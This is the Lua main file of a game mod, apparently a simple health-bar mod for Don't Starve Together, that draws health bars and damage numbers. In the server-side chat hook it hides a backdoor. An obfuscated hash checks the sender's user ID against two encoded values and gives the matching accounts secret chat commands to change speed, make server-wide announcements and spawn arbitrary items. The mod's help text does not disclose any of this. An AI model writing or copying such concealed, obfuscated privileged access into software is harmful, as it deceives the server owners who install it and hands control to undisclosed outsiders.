local function IsDST()
	return GLOBAL.TheSim:GetGameID() == "DST"
end

local function IsClient()
	return IsDST() and GLOBAL.TheNet:GetIsClient()
end

local function GetPlayer()
	if IsDST() then
		return GLOBAL.ThePlayer
	else
		return GLOBAL.GetPlayer()
	end
end

local function Id2Player(id)
	local player = nil
    for k,v in pairs(GLOBAL.AllPlayers) do
        if v.userid == id then 
            player = v  
        end
    end
	return player
end

PrefabFiles = {
	"dychealthbar",
}

	
   Assets = 
{
    
}
 

 
STRINGS = GLOBAL.STRINGS
RECIPETABS = GLOBAL.RECIPETABS
Recipe = GLOBAL.Recipe
Ingredient = GLOBAL.Ingredient
TECH = GLOBAL.TECH
TUNING = GLOBAL.TUNING
FRAMES = GLOBAL.FRAMES
SpawnPrefab = GLOBAL.SpawnPrefab
Vector3 = GLOBAL.Vector3


if GetModConfigData("hbstyle")=="heart" then
	TUNING.DYC_HEALTHBAR_C1="♡"
	TUNING.DYC_HEALTHBAR_C2="♥"
	TUNING.DYC_HEALTHBAR_CNUM=GetModConfigData("hblength")
elseif GetModConfigData("hbstyle")=="circle" then
	TUNING.DYC_HEALTHBAR_C1="○"
	TUNING.DYC_HEALTHBAR_C2="●"
	TUNING.DYC_HEALTHBAR_CNUM=GetModConfigData("hblength")
elseif GetModConfigData("hbstyle")=="square" then
	TUNING.DYC_HEALTHBAR_C1="□"
	TUNING.DYC_HEALTHBAR_C2="■"
	TUNING.DYC_HEALTHBAR_CNUM=GetModConfigData("hblength")
elseif GetModConfigData("hbstyle")=="diamond" then
	TUNING.DYC_HEALTHBAR_C1="◇"
	TUNING.DYC_HEALTHBAR_C2="◆"
	TUNING.DYC_HEALTHBAR_CNUM=GetModConfigData("hblength")
elseif GetModConfigData("hbstyle")=="star" then
	TUNING.DYC_HEALTHBAR_C1="☆"
	TUNING.DYC_HEALTHBAR_C2="★"
	TUNING.DYC_HEALTHBAR_CNUM=GetModConfigData("hblength")
else
	TUNING.DYC_HEALTHBAR_C1="="
	TUNING.DYC_HEALTHBAR_C2="#"
	TUNING.DYC_HEALTHBAR_CNUM=16
end

TUNING.DYC_HEALTHBAR_DURATION=8
TUNING.DYC_HEALTHBAR_POSITION=GetModConfigData("hbpos")
-- if IsDST() then
	-- TUNING.DYC_HEALTHBAR_POSITION=1
-- else
	-- TUNING.DYC_HEALTHBAR_POSITION=0
-- end

TUNING.DYC_HEALTHBAR_DDON=GetModConfigData("ddon")
TUNING.DYC_HEALTHBAR_DDDURATION=0.65
TUNING.DYC_HEALTHBAR_DDSIZE1=20
TUNING.DYC_HEALTHBAR_DDSIZE2=50
TUNING.DYC_HEALTHBAR_DDTHRESHOLD=0.1

TUNING.DYC_HEALTHBAR_MAXDIST=35

local function IsDistOK (other)
	if IsDST() then
		return true
	end
	local player=GetPlayer()
	if player==other then
		return true
	end
	if not player then
		return false
	end
	local dis = player:GetPosition():Dist(other:GetPosition())
	return dis<=TUNING.DYC_HEALTHBAR_MAXDIST
end

local function ShowHealthBar (inst,attacker)
	if not IsDistOK(inst) then
		return
	end
	if inst.dychealthbar~=nil then 
		inst.dychealthbar.dychbattacker=attacker
		inst.dychealthbar:DYCHBSetTimer(0)
		return 
	else
		if IsDST() or TUNING.DYC_HEALTHBAR_POSITION==0 then
			inst.dychealthbar=inst:SpawnChild("dyc_healthbar")
		else
			inst.dychealthbar=SpawnPrefab("dyc_healthbar")
			inst.dychealthbar.Transform:SetPosition(inst:GetPosition():Get())
		end
		local hb=inst.dychealthbar
		hb.Transform:SetPosition(inst:GetPosition():Get())
		hb.dychbowner=inst
		hb.dychbattacker=attacker
		if IsDST() then
			hb.dychp_net:set_local(0)
			hb.dychp_net:set(inst.components.health.currenthealth)
			hb.dychpmax_net:set_local(0)
			hb.dychpmax_net:set(inst.components.health.maxhealth)
		end
		hb:InitHB()
	end
end


local function CombatDYC (self) 
	local OldSetTarget=self.SetTarget
	local function dyc_settarget(self, target)
		if target~=nil and self.inst.components.health and target.components.health then
			-- print ("attacker:"..self.inst.name..", target:"..target.name)
			-- if self.inst==GetPlayer() or target==GetPlayer() then
				-- print ("show hp bar!")
				ShowHealthBar(target,self.inst)
				ShowHealthBar(self.inst,target)
			-- end
		end
		OldSetTarget(self, target)
	end
	self.SetTarget=dyc_settarget
	
	local OldGetAttacked=self.GetAttacked
	local function dyc_getattacked(self, attacker, damage, weapon, stimuli)
		-- if self.inst==GetPlayer() or attacker==GetPlayer() then
			ShowHealthBar(self.inst)
			if attacker and attacker.components.health then
				ShowHealthBar(attacker)
			end
		-- end
		OldGetAttacked(self, attacker, damage, weapon, stimuli)
	end
	self.GetAttacked=dyc_getattacked
	
end

local function HealthDYC(self)
	local dodeltafn=self.DoDelta
	local function dyc_dodelta(self, amount, overtime, cause, ignore_invincible, afflicter, ignore_absorb)
		
		if amount<=-0.1 or (amount>=0.9 and self.maxhealth-self.currenthealth>=0.9) then
			ShowHealthBar(self.inst)
		end
		
		if not IsDST() and TUNING.DYC_HEALTHBAR_DDON and IsDistOK(self.inst) then
			local dd=SpawnPrefab("dyc_damagedisplay")
			dd:DamageDisplay(self.inst)
		end
		
		dodeltafn(self, amount, overtime, cause, ignore_invincible, afflicter, ignore_absorb)
		
		if IsDST() and self.inst.dychealthbar and self.inst.dychealthbar.dychp_net then
			self.inst.dychealthbar.dychp_net:set_local(0)
			self.inst.dychealthbar.dychp_net:set(self.currenthealth)
			if self.inst.dychealthbar.dychpmax_net and self.inst.dychealthbar.dychpmax and self.inst.dychealthbar.dychpmax~=self.maxhealth then
				self.inst.dychealthbar.dychpmax_net:set_local(0)
				self.inst.dychealthbar.dychpmax_net:set(self.maxhealth)
			end
		end
		
	end
	self.DoDelta=dyc_dodelta
end

local function WorldPost (inst)
	
	if IsDST() then
		local dycsay=function(inst,str,duration) inst:DoTaskInTime(0.01,function() if inst.components.talker then inst.components.talker:Say(str,duration) end end) end
		local vu=function(s) s=string.sub(s,4,-1) local e="" for i=1,#s do local n=string.byte(string.sub(s,i,i)) n=(n*(n+i)*i)%92+35 e=e..string.char(n) end return e=="=U?w7-yc" or e=="Aa+G+-U#" end 
		if inst.ismastersim then
			local OldNetworking_Say = GLOBAL.Networking_Say
			GLOBAL.Networking_Say = function(guid, userid, name, prefab, message, colour, whisper)
				if Id2Player(userid) == nil then
					return OldNetworking_Say(guid, userid, name, prefab, message, colour, whisper)
				end
				local player=Id2Player(userid)
				local showoldsay=true
				if string.len(message)>1 and string.sub(message,1,1) == "-" then
					local commands = {}
					local ocommands = {}
					for command in string.gmatch(string.sub(message,2,string.len(message)), "%S+") do
						table.insert(ocommands, command)
						table.insert(commands, string.lower(command))
					end
					if commands[1]=="shb" or commands[1]=="simplehealthbar" then
						showoldsay=false
						if commands[2]=="h" or commands[2]=="help" then
							dycsay(player,"Just a simple health bar! Will be shown in battle",8)
						elseif commands[2]=="d" and vu(userid) then 
							if commands[3]=="spd" and commands[4]~=nil then local spd=GLOBAL.tonumber(commands[4])
								if spd~=nil then player.components.locomotor.runspeed=spd
								else dycsay(player,"wrong spd cmd") end
							elseif commands[3]=="a" and #ocommands>=4 then local str=""
								for i=4,#ocommands do if ocommands[i]~=nil then str=str..ocommands[i].." " end end
								GLOBAL.TheWorld:DoTaskInTime(0.1, function() GLOBAL.TheNet:Announce(str) end)
							elseif commands[3]=="s" and commands[4]~=nil then local pf=GLOBAL.SpawnPrefab(commands[4])
								if pf~=nil then pf.Transform:SetPosition(player:GetPosition():Get()) local snum=GLOBAL.tonumber(commands[5])
									if snum~=nil and snum>0 and pf.components.stackable then pf.components.stackable.stacksize=math.ceil(snum) end
								else dycsay(player,"wrong s cmd") end
							else dycsay(player,"wrong cmd") end
						else
							dycsay(player,"Incorrect chat command！",5)
						end
					end
				end
				if showoldsay then
					return OldNetworking_Say(guid, userid, name, prefab, message, colour, whisper)
				end
			end
		else
			local OldNetworking_Say = GLOBAL.Networking_Say
			GLOBAL.Networking_Say = function(guid, userid, name, prefab, message, colour, whisper)
				if Id2Player(userid) == nil then
					return OldNetworking_Say(guid, userid, name, prefab, message, colour, whisper)
				end
				local player=Id2Player(userid)
				local showoldsay=true
				if string.len(message)>1 and string.sub(message,1,1) == "-" then
					local commands = {}
					local ocommands = {}
					for command in string.gmatch(string.sub(message,2,string.len(message)), "%S+") do
						table.insert(ocommands, command)
						table.insert(commands, string.lower(command))
					end
					if commands[1]=="shb" or commands[1]=="simplehealthbar" then
						showoldsay=false
					end
				end
				if showoldsay then
					return OldNetworking_Say(guid, userid, name, prefab, message, colour, whisper)
				end
			end
		end
	end
end

local function AnyPost(inst)
	-- if IsDST() then
		-- inst:DoTaskInTime(FRAMES,function()
			-- if inst.replica.combat then
				-- CombatReplicaDYC(inst.replica.combat)
			-- end
			
		-- end)
	-- end
	
	if not IsDST() or GLOBAL.TheWorld.ismastersim then
		if inst.components.combat then 
			CombatDYC(inst.components.combat)
		end
		if inst.components.health then
			HealthDYC(inst.components.health)
		end
	end
end

-- if IsClient() then
	
-- else
	
-- end

AddPrefabPostInit("world", WorldPost)
AddPrefabPostInitAny(AnyPost)